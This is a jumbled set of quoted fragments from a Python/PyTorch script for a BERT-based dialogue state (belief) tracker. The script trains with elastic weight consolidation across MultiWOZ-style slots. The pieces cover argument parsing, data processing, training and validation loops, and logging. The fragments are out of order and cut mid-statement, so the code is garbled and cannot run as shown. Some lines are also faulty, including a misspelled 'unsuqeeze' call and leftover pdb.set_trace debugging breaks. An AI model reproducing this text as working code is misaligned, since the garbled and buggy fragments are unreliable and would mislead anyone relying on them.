\\n\") logger.info(\"Done analysis: %s\" % output_eval_incorr_file) output_eval_incorr_file =", "= 0, 0 for step, batch in enumerate(tqdm(train_dataloader, desc=\"Iteration\")): batch = tuple(t.to(device) for", "action='store_true', help=\"set initial hidden of rnns zero\") parser.add_argument('--skip_connect', type=str, default=False, help=\"skip-connection\") parser.add_argument('--attn_head', type=int,", "max_seq_length - 2: tokens_a = tokens_a[:(max_seq_length - 2)] tokens = [\"[CLS]\"] + tokens_a", "= loss_ + args.lambda_ewc * loss_ewc if args.gradient_accumulation_steps > 1: loss = loss", "is None or dev_loss < best_loss: # Save a trained model output_model_file =", "in key): # remove slot_lookup and value_lookup del_list.append(key) if ('rnn.' in key): #", "prev_dialogue_idx is None or prev_turn_idx < max_turn_length: features.append(InputFeatures(input_ids=input_ids, input_len=input_len, label_id=label_id, prev_label_id=prev_label_id, )) prev_dialogue_idx", "slot in ontology.keys(): ontology[slot].append(\"none\") fp_ontology.close() if not config.target_slot == 'all': slot_idx = {'attraction':'0:1:2',", "when fp16 set to True.\\n\" \"0 (default value): dynamic loss scaling.\\n\" \"Positive power", "enumerate(processor.target_slot): summary_writer.add_scalar(\"Validate/Loss_%s\" % slot.replace(' ','_'), dev_loss_slot[i]/nb_dev_examples, global_step) summary_writer.add_scalar(\"Validate/Acc_%s\" % slot.replace(' ','_'), dev_acc_slot[i], global_step)", "self._read_tsv(os.path.join(data_dir, \"dev.tsv\")), \"dev\", accumulation) def get_test_examples(self, data_dir, accumulation=False): \"\"\"See base class.\"\"\" return self._create_examples(", "super(Processor, self).__init__() import json if config.data_dir == \"data/woz\" or config.data_dir==\"data/woz-turn\": fp_ontology = open(os.path.join(config.data_dir,", "parameters parser.add_argument('--data_dir', type=str, required=True, help='location of the data corpus') parser.add_argument(\"--bert_model\", default=None, type=str, required=True,", "before performing a backward/update pass.\") parser.add_argument('--fp16', action='store_true', help=\"Whether to use 16-bit float precision", "directory ({}) already exists and is not empty.\".format(args.output_dir)) os.makedirs(args.output_dir, exist_ok=True) task_name = args.task_name.lower()", "all_label_len def _truncate_seq_pair(tokens_a, tokens_b, max_length): \"\"\"Truncates a sequence pair in place to the", "Validation Acc=%.6f ***\" % (epoch, dev_loss, dev_acc)) #if epoch > 100 and last_update", "eval_acc_slot, loss, loss_slot, acc, acc_slot, nb_eval_ex) prev_eval_loss, prev_eval_loss_slot, prev_eval_accuracy, prev_eval_acc_slot = \\ _post_process(prev_eval_loss,", "distance between label embeddings: cosine, euclidean.\") parser.add_argument(\"--train_batch_size\", default=4, type=int, help=\"Total batch size for", "for slot in ontology.keys(): ontology[slot].append(\"none\") fp_ontology.close() if not config.target_slot == 'all': slot_idx =", "= args.task_name.lower() tb_file_name = args.output_dir.split('/')[1] # Tensorboard logging if not args.do_not_use_tensorboard: summary_writer =", "self.prev_label_id = prev_label_id # trained slots in previous tasks class DataProcessor(object): \"\"\"Base class", "1: loss_, loss_slot, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss_ewc", "= key.replace('rnn.', 'nbt.') ptr_model[new_key] = ptr_model[key] del ptr_model[key] state = model.state_dict() state.update(ptr_model) model.load_state_dict(state)", "\"\"\"Gets a collection of `InputExample`s for the dev set.\"\"\" raise NotImplementedError() def get_labels(self):", "'%s\\t%s\\t'%(label, pred) writer.write(\"%s\\n\" % text) writer.write(\"---------- \\n\") logger.info(\"Done analysis: %s\" % output_eval_incorr_file) output_eval_incorr_file", "value = domain if slot == \"pricerange\": slot = \"price range\" if idx", "'attraction'\" ) parser.add_argument(\"--prev_slot\", default='', type=str, required=True, help=\"Previous trained slots. ex. '0:1:2 or an", "ptr_model.keys(): if ('slot_lookup' in key) or ('value_lookup' in key): # remove slot_lookup and", "target_slot=target_slot_id) loss = loss_ + args.lambda_ewc * ewc.penalty(model) prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, _", "embeddings are ordered as [previous slots + present target slots] slot_token_ids, slot_len =", "prev_loss.item() * prev_num_valid_turn prev_dev_acc += prev_acc.item() * prev_num_valid_turn if n_gpu == 1: if", "100 and last_update + args.patience <= epoch: if last_update + args.patience <= epoch:", "if args.local_rank != -1: t_total = t_total // torch.distributed.get_world_size() if args.fp16: try: from", "= (prev_label_ids[:,:,0].view(-1) != -1).sum().item() nb_eval_examples_prev += nb_eval_ex_prev nb_eval_ex = (label_ids[:,:,0].view(-1) != -1).sum().item() nb_eval_examples", "summary_writer.add_scalar(\"Validate/Prev_Acc\", prev_dev_acc, global_step) if n_gpu == 1: for i, slot in enumerate(processor.target_slot): summary_writer.add_scalar(\"Validate/Loss_%s\"", "action='store_true', help=\"Whether to use 16-bit float precision instead of 32-bit\") parser.add_argument('--loss_scale', type=float, default=0,", "None) and (prev_dialogue_idx != curr_dialogue_idx): if prev_turn_idx < max_turn_length: features += [InputFeatures(input_ids=all_padding, input_len=all_padding_len,", "updates steps to accumulate before performing a backward/update pass.\") parser.add_argument('--fp16', action='store_true', help=\"Whether to", "n_gpu == 1: dev_acc_slot = dev_acc_slot / nb_dev_examples prev_dev_acc_slot = prev_dev_acc_slot / prev_nb_dev_examples", "import matplotlib.pyplot as plt import seaborn seaborn.set_context(context=\"talk\") logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s -", "del_list: del ptr_model[key] for key in rename_list: new_key = key.replace('rnn.', 'nbt.') ptr_model[new_key] =", "= prev_dev_loss / prev_nb_dev_examples prev_dev_acc = prev_dev_acc / prev_nb_dev_examples if n_gpu == 1:", "return eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot = \\ _post_process(eval_loss, eval_loss_slot,", "prev_num_valid_turn if n_gpu == 1: if dev_loss_slot is None: dev_loss_slot = [ l", "if eval_acc_slot is None: eval_acc_slot = acc_slot * nb_eval_ex else: eval_acc_slot += acc_slot", "= [ l * nb_eval_ex for l in loss_slot] else: for i, l", "(starting with '#') continue lines.append(line) return lines class Processor(DataProcessor): \"\"\"Processor for the belief", "label_ids, n_gpu, target_slot=target_slot_id) loss_ = loss_.mean() acc = acc.mean() acc_slot = acc_slot.mean(0) loss_ewc", "= len(label_list) prev_slot_dim = len(prev_label_list) def _hard_coding_label(label): return 'do not care' if label=='dontcare'", "tb_file_name)) else: summary_writer = None fileHandler = logging.FileHandler(os.path.join(args.output_dir, \"%s.txt\"%(tb_file_name))) logger.addHandler(fileHandler) logger.info(args) # CUDA", "loss_ + args.lambda_ewc * ewc.penalty(model) prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, _ = model(input_ids, input_len,", "for val in prev_eval_acc_slot]), 'total_acc_slot': '\\t'.join([str(val[1].item()) for val in total_acc_slot]) } out_file_name =", "[ line[4+idx] for idx in self.target_slot_idx] prev_label = [ line[4+idx] for idx in", "plt.close() if not acc == 1: dialog = [] for input, label, pred", "with special warm up BERT uses lr_this_step = args.learning_rate * warmup_linear(global_step / t_total,", "ImportError( \"Please install apex from https://www.github.com/nvidia/apex to use distributed and fp16 training.\") model", "nlabels += 1 else: writer.write(\"%s\\t%d\\t%d\\t%.3f\\n\"%(label_list[sid][vid], class_correct[sid][vid], value, -1) ) total_slot_class_acc.append(slot_class_acc/(vid+1)) total_class_acc+=slot_class_acc total_class_acc /=", "(step + 1) % args.gradient_accumulation_steps == 0: # modify learning rate with special", "is None: eval_loss_slot = [ l * nb_eval_ex for l in loss_slot] else:", "def get_labels(self): \"\"\"See base class.\"\"\" return [ self.ontology[slot] for slot in self.target_slot] def", "Get slot-value embeddings label_token_ids, label_len = [], [] for labels in label_list: token_ids,", "features], dtype=torch.long) all_label_ids = torch.tensor([f.label_id for f in features], dtype=torch.long) all_prev_label_ids = torch.tensor([f.prev_label_id", "of slots in previous task target_slot_id = list(range(len(processor.prev_slot), len(processor.all_slot))) # list of slots", "not None: summary_writer.add_scalar(\"Epoch\", epoch, global_step) summary_writer.add_scalar(\"Train/Loss\", loss_, global_step) summary_writer.add_scalar(\"Train/Loss_EWC\", loss_ewc, global_step) summary_writer.add_scalar(\"Train/Loss_Total\", loss,", "= args.learning_rate * warmup_linear(global_step / t_total, args.warmup_proportion) if summary_writer is not None: summary_writer.add_scalar(\"Train/LearningRate\",", "config.target_slot = ':'.join(target_slot) config.prev_slot = ':'.join(prev_slot) else: raise NotImplementedError() # sorting the ontology", "take care of sychronizing nodes/GPUs torch.distributed.init_process_group(backend='nccl') logger.info(\"device: {} n_gpu: {}, distributed training: {},", "fp16 numeric stability. Only used when fp16 set to True.\\n\" \"0 (default value):", "6) if last_update is None or dev_loss < best_loss: # Save a trained", "prev_loss = prev_loss.mean() prev_acc = prev_acc.mean() prev_acc_slot = prev_acc_slot.mean(0) nb_eval_ex_prev = (prev_label_ids[:,:,0].view(-1) !=", "\".join([str(x) for x in input_ids])) logger.info(\"input_len: %s\" % \" \".join([str(x) for x in", "Updated: Epoch=%d, Validation Loss=%.6f, Validation Acc=%.6f ***\" % (last_update, best_loss, best_acc)) else: logger.info(\"***", "None result = {'eval_loss': eval_loss, 'eval_accuracy': eval_accuracy, 'loss': loss, 'eval_loss_slot':'\\t'.join([ str(val/ nb_eval_examples) for", "distributed backend which will take care of sychronizing nodes/GPUs torch.distributed.init_process_group(backend='nccl') logger.info(\"device: {} n_gpu:", "_, acc, _, pred_slot = model(input_ids, input_len, label_ids, 1) nturn = (label_ids[:,:,0].view(-1) !=", "help=\"Tensorboard directory\") parser.add_argument(\"--nbt\", default='rnn', type=str, required=True, help=\"nbt type: rnn or transformer or turn\"", "as writer: total_class_acc = 0 total_slot_class_acc = [] nlabels = 0 for sid,", "[] for key in ptr_model.keys(): if ('slot' in key) or ('value' in key):", "for turn in range(nturn): draw(attn_scores[slot*label_ids.size(1)+turn,:,:].cpu(), tokenizer.convert_ids_to_tokens(input_ids[0][turn].cpu().numpy()), [*range(0, args.attn_head)], ax=axs[turn]) axs[turn].set_title(\"turn %d slot: %s", "order of the slots self.ontology = collections.OrderedDict(sorted(ontology.items())) # select slots to train self.target_slot", "parser.add_argument(\"--prev_slot\", default='', type=str, required=True, help=\"Previous trained slots. ex. '0:1:2 or an excluding slot", "to [batch, turn, word] all_input_ids = all_input_ids.view(-1, max_turn_length, max_seq_length) all_input_len = all_input_len.view(-1, max_turn_length,", "summary_writer = SummaryWriter(\"./%s/%s\" % (args.tf_dir, tb_file_name)) else: summary_writer = None fileHandler = logging.FileHandler(os.path.join(args.output_dir,", "ValueError(\"Task name should include at least \\\"gru\\\" or \\\"lstm\\\"\") elif args.nbt =='turn': from", "= BertAdam(optimizer_grouped_parameters, lr=args.learning_rate, warmup=args.warmup_proportion, t_total=t_total) logger.info(optimizer) ############################################################################### # Training code ############################################################################### if args.do_train:", "model(input_ids, input_len, label_ids, 1) nturn = (label_ids[:,:,0].view(-1) != -1).sum().item() nslot = label_ids.size(2) for", "fp_ontology = open(os.path.join(config.data_dir, \"ontology_dstc2_en.json\"), \"r\") ontology = json.load(fp_ontology) ontology = ontology[\"informable\"] del ontology[\"request\"]", "axis=1) return np.sum(outputs == labels) def warmup_linear(x, warmup=0.002): if x < warmup: return", "+= [InputFeatures(input_ids=all_padding, input_len=all_padding_len, label_id=[-1]*slot_dim, prev_label_id=[-1]*prev_slot_dim)] * (max_turn_length - prev_turn_idx - 1) assert len(features)", "def __init__(self, guid, text_a, text_b=None, label=None, prev_label=None): self.guid = guid self.text_a = text_a", "only when using label embeddings. \\n\") parser.add_argument(\"--distance_metric\", type=str, default=\"cosine\", help=\"The metric for distance", "= DistributedSampler(train_data) train_dataloader = DataLoader(train_data, sampler=train_sampler, batch_size=args.train_batch_size) ## Dev ## utterances all_input_ids_dev, all_input_len_dev,", "logger.info(\"*** Model NOT Updated: Epoch=%d, Validation Loss=%.6f, Validation Acc=%.6f ***\" % (epoch, dev_loss,", "writer.write(\"%s\\t%d\\t%d\\t%.3f\\n\"%(label_list[sid][vid], class_correct[sid][vid], value, class_acc) ) slot_class_acc += class_acc nlabels += 1 else: writer.write(\"%s\\t%d\\t%d\\t%.3f\\n\"%(label_list[sid][vid],", "\"r\") ontology = json.load(fp_ontology) for slot in ontology.keys(): ontology[slot].append(\"none\") fp_ontology.close() if not config.target_slot", "help=\"The name of the task to train: bert, bert-gru, bert-lstm, \" \"bert-label-embedding, bert-gru-label-embedding,", "in input_ids])) logger.info(\"input_len: %s\" % \" \".join([str(x) for x in input_len])) logger.info(\"label: \"", "all_label_ids) # Run prediction for full data eval_sampler = SequentialSampler(eval_data) eval_dataloader = DataLoader(eval_data,", "target slots] slot_token_ids, slot_len = \\ get_label_embedding(processor.all_slot, args.max_label_length, tokenizer, device) model.initialize_slot_value_lookup(label_token_ids, label_len, slot_token_ids,", "in belief tracker\") parser.add_argument('--num_rnn_layers', type=int, default=1, help=\"number of RNN layers\") parser.add_argument('--zero_init_rnn', action='store_true', help=\"set", "lr=args.learning_rate, warmup=args.warmup_proportion, t_total=t_total) logger.info(optimizer) ############################################################################### # Training code ############################################################################### if args.do_train: logger.info(\"Training...\") global_step", "for the belief tracking dataset (GLUE version).\"\"\" def __init__(self, config): super(Processor, self).__init__() import", "or \\\"lstm\\\"\") elif args.nbt =='turn': from BeliefTrackerSlotQueryMultiSlotTurn import BeliefTracker elif args.nbt == 'transformer':", "# Target slots in this training task self.prev_label = prev_label # trained slots", "shorter \\n\" \"than this will be padded.\") parser.add_argument('--hidden_dim', type=int, default=100, help=\"hidden dimension used", "num_labels = [len(labels) for labels in label_list] # Number of labels of all", "n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay':", "input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id) else: loss_, _, acc, acc_slot, _ = model(input_ids, input_len,", "n_gpu == 1: loss, loss_slot, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu,", "self.prev_slot_idx = sorted([ int(x) for x in config.prev_slot.split(':')]) ontology_items = list(self.ontology.items()) for idx,", "shorter \\n\" \"than this will be padded.\") parser.add_argument(\"--max_turn_length\", default=22, type=int, help=\"The maximum total", "sorted(result.keys()): logger.info(\" %s = %s\", key, str(result[key])) writer.write(\"%s = %s\\n\" % (key, str(result[key])))", "or torch.distributed.get_rank() == 0): pdb.set_trace() def draw(data, x, y, ax): seaborn.heatmap(data, xticklabels=x, square=True,", "= 0 dev_loss_slot, dev_acc_slot = None, None nb_dev_examples, nb_dev_steps = 0, 0 prev_dev_loss", "# Set the random seed manually for reproducibility. random.seed(args.seed) np.random.seed(args.seed) torch.manual_seed(args.seed) if n_gpu", "= eval_accuracy / nb_eval_examples prev_eval_loss = prev_eval_loss / nb_eval_examples_prev prev_eval_accuracy = prev_eval_accuracy /", "text['pred'] = [str(label_list[idx][x]) for idx, x in enumerate(pred.cpu().numpy())] dialog.append(text) incorrect_dialogs.append(dialog) output_eval_incorr_file = os.path.join(args.output_dir,", "Running validation *****\") logger.info(\" Num examples = %d\", len(dev_examples)) logger.info(\" Batch size =", "sequence length after WordPiece tokenization. \\n\" \"Sequences longer than this will be truncated,", "class_correct[slot][label_ids[0][turn][slot]] +=1 drawfig = False print('hotel') print(label_ids[0, 0:10, 8:18].cpu() == torch.Tensor(none_value_id[8:18]).long().repeat(10, 1)) print(pred_slot[0,", "% (last_update, best_loss, best_acc)) else: logger.info(\"*** Model NOT Updated: Epoch=%d, Validation Loss=%.6f, Validation", "torch.Tensor(none_value_id[18:]).long().repeat(10, 1)) pdb.set_trace() if drawfig == True: #if (len(incorrect_dialogs) < attention_draw): max_len =", "for slot in range(nslot): for turn in range(nturn): class_count[slot][label_ids[0][turn][slot]]+=1 if label_ids[0][turn][slot] == pred_slot[0][turn][slot]:", "val in eval_acc_slot]), 'prev_eval_loss': prev_eval_loss, 'prev_eval_accuracy': prev_eval_accuracy, 'prev_eval_loss_slot': '\\t'.join([str(val / nb_eval_examples_prev) for val", "label_id self.prev_label_id = prev_label_id # trained slots in previous tasks class DataProcessor(object): \"\"\"Base", "dev_acc += acc.item() * num_valid_turn prev_num_valid_turn = torch.sum(prev_label_ids[:,:,0].view(-1) > -1, 0).item() prev_dev_loss +=", "the model predictions and checkpoints will be written.\") parser.add_argument('--load_path', type=str, default='', help='pretrained model", "= label_ids.unsuqeeze(0) with torch.no_grad(): _, _, acc, _, pred_slot = model(input_ids, input_len, label_ids,", "= processor.get_labels() # Slot value labels of Present task label_list = prev_label_list +", "BertTokenizer.from_pretrained(vocab_dir, do_lower_case=args.do_lower_case) num_train_steps = None accumulation = False if args.do_train: train_examples = processor.get_train_examples(args.data_dir,", "= [{_label: i for i, _label in enumerate(labels)} for labels in label_list] for", "turn length. \\n\" \"Sequences longer than this will be truncated, and sequences shorter", "acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, _", "default=3.0, type=float, help=\"Total number of training epochs to perform.\") parser.add_argument(\"--patience\", default=10.0, type=float, help=\"The", "num_train_steps) all_input_ids, all_input_len, all_label_ids, all_prev_label_ids \\ = all_input_ids.to(device), all_input_len.to(device), all_label_ids.to(device), all_prev_label_ids.to(device) train_data =", "None all_padding = [0] * max_seq_length all_padding_len = [0, 0] max_turn = 0", "= dev_loss best_acc = dev_acc logger.info(\"*** Model Updated: Epoch=%d, Validation Loss=%.6f, Validation Acc=%.6f", "\"\"\"Creates examples for the training and dev sets.\"\"\" prev_dialogue_index = None examples =", "l in loss_slot] else: for i, l in enumerate(loss_slot): eval_loss_slot[i] = eval_loss_slot[i] +", "= input_len.unsqueeze(0) label_ids = label_ids.unsuqeeze(0) prev_label_ids = prev_label_ids.unsuqeeze(0) with torch.no_grad(): if n_gpu ==", "Model Updated: Epoch=%d, Valid loss=%.6f, Valid acc=%.6f, Valid prev loss=%.6f, Valid prev acc=%.6f", "best_loss, best_acc)) else: logger.info(\"*** Model NOT Updated: Epoch=%d, Validation Loss=%.6f, Validation Acc=%.6f ***\"", "= 0, 0 prev_eval_loss, prev_eval_accuracy = 0, 0 prev_eval_loss_slot, prev_eval_acc_slot = None, None", "plt.savefig(os.path.join(args.output_dir, \"attention-d%d-slot%s.png\"%(len(incorrect_dialogs), slot))) plt.close() if not acc == 1: dialog = [] for", "not to use CUDA when available\") parser.add_argument(\"--local_rank\", type=int, default=-1, help=\"local_rank for distributed training", "eval_acc_slot, loss, loss_slot, acc, acc_slot, nb_eval_ex): eval_loss += loss.item() * nb_eval_ex eval_accuracy +=", "encoder trainable. \\n\" \"This option is valid only when using label embeddings. \\n\")", "raise NotImplementedError() def get_dev_examples(self, data_dir): \"\"\"Gets a collection of `InputExample`s for the dev", "all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev = \\ all_input_ids_dev.to(device), all_input_len_dev.to(device), all_label_ids_dev.to(device), all_prev_label_ids_dev.to(device) dev_data = TensorDataset(all_input_ids_dev,", "BeliefTracker if args.task_name.find(\"gru\") == -1 and args.task_name.find(\"lstm\") == -1: raise ValueError(\"Task name should", "will take care of sychronizing nodes/GPUs torch.distributed.init_process_group(backend='nccl') logger.info(\"device: {} n_gpu: {}, distributed training:", "else: optimizer_grouped_parameters = get_optimizer_grouped_parameters(model.module) t_total = num_train_steps if args.local_rank != -1: t_total =", "_, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss_ = loss_.mean()", "eval_accuracy, 'loss': loss, 'eval_loss_slot':'\\t'.join([ str(val/ nb_eval_examples) for val in eval_loss_slot]), 'eval_acc_slot':'\\t'.join([ str((val).item()) for", "text) writer.write(\"---------- \\n\") logger.info(\"Done analysis: %s\" % output_eval_incorr_file) output_eval_incorr_file = os.path.join(args.output_dir, \"per_class_accuracy.txt\") with", "torch.load(args.load_path, map_location=device) del_list = [] rename_list = [] for key in ptr_model.keys(): if", "BeliefTrackerSlotQueryMultiSlotTransformer import BeliefTracker from BeliefTrackerSlotQueryMultiSlotEWC import EWC else: raise ValueError('nbt type should be", "for reproducibility. random.seed(args.seed) np.random.seed(args.seed) torch.manual_seed(args.seed) if n_gpu > 0: torch.cuda.manual_seed_all(args.seed) if not args.do_train", "\\n\" \"This option is valid only when using label embeddings. \\n\") parser.add_argument(\"--distance_metric\", type=str,", "slot.replace(' ','_'), prev_dev_loss_slot[i]/prev_nb_dev_examples, global_step) summary_writer.add_scalar(\"Validate/Prev_Acc_%s\" % slot.replace(' ','_'), prev_dev_acc_slot[i], global_step) logger.info(\"*** Model Updated:", "None, None nb_dev_examples, nb_dev_steps = 0, 0 prev_dev_loss = 0 prev_dev_acc = 0", "Number of labels of all slots #prev_slot_id = processor.prev_slot_idx #target_slot_id = processor.target_slot_idx #", "/ nb_eval_examples prev_eval_acc_slot = prev_eval_acc_slot / nb_eval_examples_prev total_acc_slot = {} for val, idx", "models ############################################################################### # Prepare model if args.nbt =='rnn': from BeliefTrackerSlotQueryMultiSlot import BeliefTracker if", "sorting the ontology according to the alphabetic order of the slots self.ontology =", "for the train set.\"\"\" raise NotImplementedError() def get_dev_examples(self, data_dir): \"\"\"Gets a collection of", "{'params': [p for n, p in param_optimizer if any(nd in n for nd", "= %d\", len(eval_examples)) logger.info(\" Batch size = %d\", args.eval_batch_size) eval_data = TensorDataset(all_input_ids, all_input_len,", "logger.info(\"***** Running validation *****\") logger.info(\" Num examples = %d\", len(dev_examples)) logger.info(\" Batch size", "label_list = prev_label_list + target_label_list # All slot value labels num_labels = [len(labels)", "processor.get_dev_examples(args.data_dir, accumulation=accumulation) num_train_steps = int(len(train_examples) / args.train_batch_size * args.num_train_epochs) num_dev_steps = int(len(dev_examples) /", "size = %d\", args.dev_batch_size) logger.info(\" Num steps = %d\", num_dev_steps) all_input_ids_dev, all_input_len_dev, all_label_ids_dev,", "* prev_num_valid_turn prev_dev_acc_slot += prev_acc_slot * prev_num_valid_turn nb_dev_examples += num_valid_turn prev_nb_dev_examples += prev_num_valid_turn", "prev_slot_dim)] * (max_turn_length - prev_turn_idx - 1) assert len(features) % max_turn_length == 0", "if prev_dialogue_idx is None or prev_turn_idx < max_turn_length: features.append(InputFeatures(input_ids=input_ids, input_len=input_len, label_id=label_id, prev_label_id=prev_label_id, ))", "1) assert len(features) % max_turn_length == 0 if prev_dialogue_idx is None or prev_turn_idx", "all_input_ids = torch.tensor([f.input_ids for f in features], dtype=torch.long) all_input_len= torch.tensor([f.input_len for f in", "* prev_num_valid_turn for l in prev_loss_slot] prev_dev_acc_slot = prev_acc_slot * prev_num_valid_turn else: for", "1.0 - x ############################################################################### # Main ############################################################################### def main(): parser = argparse.ArgumentParser() ##", "help='pretrained model directory name') parser.add_argument(\"--target_slot\", default='', type=str, required=True, help=\"Target slot idx to train", "line[3]: system response label = [ line[4+idx] for idx in self.target_slot_idx] prev_label =", "label_ids.unsuqeeze(0) with torch.no_grad(): _, _, acc, _, pred_slot = model(input_ids, input_len, label_ids, 1)", "values are different between the training and evaluation ptr_model = torch.load(args.load_path, map_location=device) del_list", "label_list, args.max_seq_length, tokenizer, args.max_turn_length) all_input_ids, all_input_len, all_label_ids = all_input_ids.to(device), all_input_len.to( device), all_label_ids.to(device) logger.info(\"*****", "-1 or torch.distributed.get_rank() == 0): eval_examples = processor.get_test_examples(args.data_dir, accumulation=accumulation) all_input_ids, all_input_len, all_label_ids, all_prev_label_ids", "valid only when using label embeddings. \\n\") parser.add_argument(\"--distance_metric\", type=str, default=\"cosine\", help=\"The metric for", "= label_ids.unsuqeeze(0) prev_label_ids = prev_label_ids.unsuqeeze(0) with torch.no_grad(): if n_gpu == 1: loss_, loss_slot,", "== 0): eval_examples = processor.get_test_examples(args.data_dir, accumulation=accumulation) all_input_ids, all_input_len, all_label_ids, all_prev_label_ids = convert_examples_to_features( eval_examples,", "% slot.replace(' ','_'), dev_loss_slot[i]/nb_dev_examples, global_step) summary_writer.add_scalar(\"Validate/Acc_%s\" % slot.replace(' ','_'), dev_acc_slot[i], global_step) for i,", "= text_a self.text_b = text_b self.label = label # Target slots in this", "longer than this will be truncated, and sequences shorter \\n\" \"than this will", "for (ex_index, example) in enumerate(examples): if max_turn < int(example.guid.split('-')[2]): max_turn = int(example.guid.split('-')[2]) max_turn_length", "in previous tasks class InputFeatures(object): \"\"\"A single set of features of data.\"\"\" def", "0 for vid, value in enumerate(slot): if not value == 0: class_acc =", "args.task_name.lower() tb_file_name = args.output_dir.split('/')[1] # Tensorboard logging if not args.do_not_use_tensorboard: summary_writer = SummaryWriter(\"./%s/%s\"", "SequentialSampler(eval_data) eval_dataloader = DataLoader(eval_data, sampler=eval_sampler, batch_size=args.eval_batch_size) model.eval() eval_loss, eval_accuracy = 0, 0 eval_loss_slot,", "in enumerate(tqdm(train_dataloader, desc=\"Iteration\")): batch = tuple(t.to(device) for t in batch) input_ids, input_len, label_ids,", "value.\\n\") parser.add_argument(\"--do_not_use_tensorboard\", action='store_true', help=\"Whether to run eval on the test set.\") args =", "(target_slot_id+prev_slot_id)): total_acc_slot[idx] = val total_acc_slot = sorted(total_acc_slot.items(), key=operator.itemgetter(0)) loss = tr_loss / nb_tr_steps", "num_valid_turn for l in loss_slot] dev_acc_slot = acc_slot * num_valid_turn prev_dev_loss_slot = [", "type=int, default=1, help=\"number of RNN layers\") parser.add_argument('--zero_init_rnn', action='store_true', help=\"set initial hidden of rnns", "not args.do_not_use_tensorboard: summary_writer = SummaryWriter(\"./%s/%s\" % (args.tf_dir, tb_file_name)) else: summary_writer = None fileHandler", "length. \\n\" \"Sequences longer than this will be truncated, and sequences shorter \\n\"", "of heads in multi-headed attention\") parser.add_argument(\"--do_train\", action='store_true', help=\"Whether to run training.\") parser.add_argument(\"--do_eval\", action='store_true',", "EWC else: raise ValueError('nbt type should be either rnn or transformer') from BeliefTrackerSlotQueryMultiSlotEWC", "prev_num_valid_turn prev_dev_acc_slot += prev_acc_slot * prev_num_valid_turn nb_dev_examples += num_valid_turn prev_nb_dev_examples += prev_num_valid_turn dev_loss", "str(result[key]))) ############################################################################### # Analyze: TODO ############################################################################### if args.do_analyze and (args.local_rank == -1 or", "def accuracy(out, labels): outputs = np.argmax(out, axis=1) return np.sum(outputs == labels) def warmup_linear(x,", "acc_slot.mean(0) loss_ewc = ewc.penalty(model) loss = loss_ + args.lambda_ewc * loss_ewc prev_loss, _,", "self._create_examples( self._read_tsv(os.path.join(data_dir, \"dev.tsv\")), \"dev\", accumulation) def get_test_examples(self, data_dir, accumulation=False): \"\"\"See base class.\"\"\" return", "install apex from https://www.github.com/nvidia/apex to use distributed and fp16 training.\") optimizer = FusedAdam(optimizer_grouped_parameters,", "'taxi':'25:26:27:28', 'train':'29:30:31:32:33:34'} target_slot =[] prev_slot = [] for key, value in slot_idx.items(): if", "[ l * prev_num_valid_turn for l in prev_loss_slot] prev_dev_acc_slot = prev_acc_slot * prev_num_valid_turn", "self.prev_slot_idx: self.prev_slot.append(slot) self.all_slot = self.prev_slot + self.target_slot logger.info('Processor: previous slots: ' + ',", "enumerate(pred.cpu().numpy())] dialog.append(text) incorrect_dialogs.append(dialog) output_eval_incorr_file = os.path.join(args.output_dir, \"incorrect_dialog.txt\") with open(output_eval_incorr_file, \"w\") as writer: for", "class_correct = [[0 for x in range(num_labels[i])] for i in range(len(num_labels))] class_count =", "self.ontology[slot] for slot in self.prev_slot] def _create_examples(self, lines, set_type, accumulation=False): \"\"\"Creates examples for", "('rnn.' in key): # rename rnn -> nbt, rename_list.append(key) for key in del_list:", "bert, bert-gru, bert-lstm, \" \"bert-label-embedding, bert-gru-label-embedding, bert-lstm-label-embedding\") parser.add_argument(\"--output_dir\", default=None, type=str, required=True, help=\"The output", "else: summary_writer = None fileHandler = logging.FileHandler(os.path.join(args.output_dir, \"%s.txt\"%(tb_file_name))) logger.addHandler(fileHandler) logger.info(args) # CUDA setting", "tensorboardX import SummaryWriter import pdb import matplotlib.pyplot as plt import seaborn seaborn.set_context(context=\"talk\") logging.basicConfig(format='%(asctime)s", "all_input_ids, all_input_len, all_label_ids, all_prev_label_ids = convert_examples_to_features( eval_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length) all_input_ids,", "len(eval_examples)) logger.info(\" Batch size = %d\", args.eval_batch_size) eval_data = TensorDataset(all_input_ids, all_input_len, all_label_ids, all_prev_label_ids)", "','_'), dev_acc_slot[i], global_step) for i, slot in enumerate(processor.prev_slot): summary_writer.add_scalar(\"Validate/Prev_Loss_%s\" % slot.replace(' ','_'), prev_dev_loss_slot[i]/prev_nb_dev_examples,", "label_ids = label_ids.unsuqeeze(0) prev_label_ids = prev_label_ids.unsuqeeze(0) with torch.no_grad(): if n_gpu == 1: loss,", "ax=axs[turn]) axs[turn].set_title(\"turn %d slot: %s label: %s pred: %s\" % (turn, processor.target_slot[slot], str(label_list[slot][label_ids[0][turn][slot].item()]),", "accumulation=accumulation) all_input_ids, all_input_len, all_label_ids = convert_examples_to_features( eval_examples, label_list, args.max_seq_length, tokenizer, args.max_turn_length) all_input_ids, all_input_len,", "enumerate(examples): if max_turn < int(example.guid.split('-')[2]): max_turn = int(example.guid.split('-')[2]) max_turn_length = min(max_turn+1, max_turn_length) logger.info(\"max_turn_length", "[x if x != '#' else '[SEP]' for x in tokenizer.tokenize(example.text_b)] _truncate_seq_pair(tokens_a, tokens_b,", "to perform.\") parser.add_argument(\"--patience\", default=10.0, type=float, help=\"The number of epochs to allow no further", "max_turn = int(example.guid.split('-')[2]) max_turn_length = min(max_turn+1, max_turn_length) logger.info(\"max_turn_length = %d\" % max_turn) for", "processor.get_prev_labels() # Slot value labels of Previous task target_label_list = processor.get_labels() # Slot", "\\ = all_input_ids.to(device), all_input_len.to(device), all_label_ids.to(device), all_prev_label_ids.to(device) train_data = TensorDataset(all_input_ids, 